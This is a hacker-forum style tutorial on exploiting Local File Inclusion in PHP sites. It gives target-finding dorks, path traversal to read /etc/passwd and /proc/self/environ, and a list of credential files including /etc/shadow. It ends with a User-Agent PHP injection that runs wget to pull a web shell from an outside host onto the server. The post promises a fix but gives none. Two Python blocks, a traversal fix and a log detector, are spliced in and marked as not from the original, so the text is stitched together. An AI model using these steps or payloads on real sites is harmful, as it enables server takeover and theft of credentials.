Hello everyone,
This is Mad Jack from Pak Cyber Pythons.
Today I'm going to teach you about the LFI vulnerability in web applications and how to fix it.

SO, FIRST THING: WHAT IS LFI?

LFI means Local File Inclusion. Through an LFI vulnerability you can read files on a website/server via your browser.

First of all you need an LFI-vulnerable website.

There are many tools that check websites for LFI vulnerabilities.
There are also some dorks for finding LFI-vulnerable sites.

Just put inurl:.php before the dork, like:


inurl:.view.php?id=

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
contact=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik=
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url= 

After using these dorks you will find many websites, but not all of them are vulnerable to LFI.

Still, you can find sites that are vulnerable to LFI.

For example, I find a website:

www.victimsite.com/action.php?page=contact.php
Now we are going to check whether it is vulnerable or not, so we replace contact.php with ../ and the URL becomes:

www.victimsite.com/action.php?page=../


Check the page source and see whether you get this error:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/victimsite.com/action.php on line 1337 
If you get this error or something like it, there is a large chance that the website is vulnerable to LFI.
If you get a blank page, the website is not vulnerable to LFI.

Now let's check for /etc/passwd to see if it is vulnerable to Local File Inclusion. Let's make a request:

www.victimsite.com/action.php?page=../../../etc/passwd 
We get an error and no /etc/passwd file:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 
So we go more directories up to find the /etc/passwd file:
www.victimsite.com/action.php?page=../../../../../../etc/passwd 
We successfully included the /etc/passwd file:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin 

There are also other useful files you can read :-)

/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default 
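To show why the number of ../ matters in the probing above, and what the fix on the application side looks like, here is an added Python model (not code from the original post): `resolve_unchecked` mirrors an unvalidated include of the page parameter, and `resolve_hardened` is the allowlist-plus-containment check a developer would put in action.php. The pages directory is taken from the post's error message; the allowlist is constructed.

```python
import posixpath

# Constructed to match the post's error message, which places action.php in
# /home/sirgod/public_html/victimsite.com (assumption: pages live there too).
PAGES_DIR = "/home/sirgod/public_html/victimsite.com"
# Hypothetical allowlist: the only pages action.php is meant to include.
ALLOWED_PAGES = {"contact.php", "about.php", "index.php"}


def resolve_unchecked(page: str) -> str:
    """Model of include($_GET['page']) with no validation: the value is
    joined to the script's directory and every '../' walks one level up,
    which is why enough '../' to reach '/' is needed before /etc/passwd
    resolves (three levels only reach /home/etc/passwd)."""
    return posixpath.normpath(posixpath.join(PAGES_DIR, page))


def resolve_hardened(page: str):
    """Return the path action.php may include, or None to reject the request."""
    # 1. Allowlist by exact name: traversal strings, /etc/passwd and
    #    /proc/self/environ never match a known page name.
    if page not in ALLOWED_PAGES:
        return None
    # 2. Containment: resolve the candidate and confirm it still sits under
    #    PAGES_DIR, so a bad allowlist entry cannot reintroduce traversal.
    #    (A real deployment would use os.path.realpath to also follow symlinks.)
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page))
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate


def main():
    for probe in ("contact.php", "../../../etc/passwd",
                  "../../../../../../etc/passwd",
                  "../../../../../proc/self/environ"):
        print(f"{probe:40} unchecked -> {resolve_unchecked(probe)}")
        print(f"{'':40} hardened  -> {resolve_hardened(probe)}")


if __name__ == "__main__":
    main()
```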
Checking if /proc/self/environ is accessible.

Now let's see if /proc/self/environ is accessible. We replace etc/passwd with proc/self/environ:

www.victimsite.com/action.php?page=../../../../../proc/self/environ 
If you get something like this:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80
then /proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not accessible.

Now, how do we inject malicious code?

We inject our malicious code into /proc/self/environ. How can we do that? We can inject our code through the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:

Choose Tamper and write the following code in the User-Agent field. (Tamper Data is a Mozilla Firefox add-on; just Google it and you will find it.)

<?system(‘wget http://www.drivehq.com/web/username/your shellname.txt -O shell.php’);?>
EXAMPLE :
<?system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>
If it doesn't work, try exec(), because system() can be disabled on the web server in php.ini.

It is not necessary to upload your shell to DriveHQ; you can use your own site or other free web hosting sites.

After you upload your shell with this code you can access it at:
www.victimsite.com/shell.php
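From the defender's side, the whole sequence in this post (the ../ probing, the reads of /etc/passwd and /proc/self/environ, and the PHP tag placed in the User-Agent) leaves a recognisable trail in the web server's access log. The following is an added Python detector, not code from the original post; the log lines are constructed in Apache combined format to replay that sequence, and the field names and severity labels are my own.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not from the original post) that
# replay the post's probing sequence against action.php?page=...
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /action.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /action.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1832 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /action.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php phpinfo(); ?>"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "Opera/9.80"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Files the post reads once traversal works; a 200 on any of them is a
# strong sign the include actually succeeded, not just that it was tried.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")


def analyse(line: str):
    """Parse one log line and return a dict with the LFI indicators found,
    or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so %2F and double-encoded %252F both become '/'.
    path = unquote(unquote(m["path"]))
    reasons = []
    if "../" in path or "..\\" in path:
        reasons.append("traversal")
    if any(s in path for s in SENSITIVE):
        reasons.append("sensitive-file")
    # The post injects PHP through User-Agent so it lands in /proc/self/environ;
    # a PHP open tag in any request header is never legitimate traffic.
    if "<?" in m["ua"] or "<?" in m["referer"]:
        reasons.append("php-tag-in-header")
    severity = "high" if "sensitive-file" in reasons and m["status"] == "200" else (
        "medium" if reasons else "none")
    return {"ip": m["ip"], "status": m["status"], "reasons": reasons, "severity": severity}


def scan(lines):
    """Return the analysed records that carry at least one indicator."""
    return [r for r in map(analyse, lines) if r and r["reasons"]]
```

A "high" record (a 200 on a sensitive path) is the one to treat as a likely successful read rather than a mere probe, and the same source IP appearing across the sequence is what ties the probe, the read and the header injection together.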
THANKS FOR READING....

In part 2 I will teach you how to fix the LFI vulnerability :)


That's all about LFI.

Comment below or give us your feedback on Facebook.


Special thanks to: JinX, Napster Dotnet.

Author : Mad Jack

NOTE: Only for educational purposes :)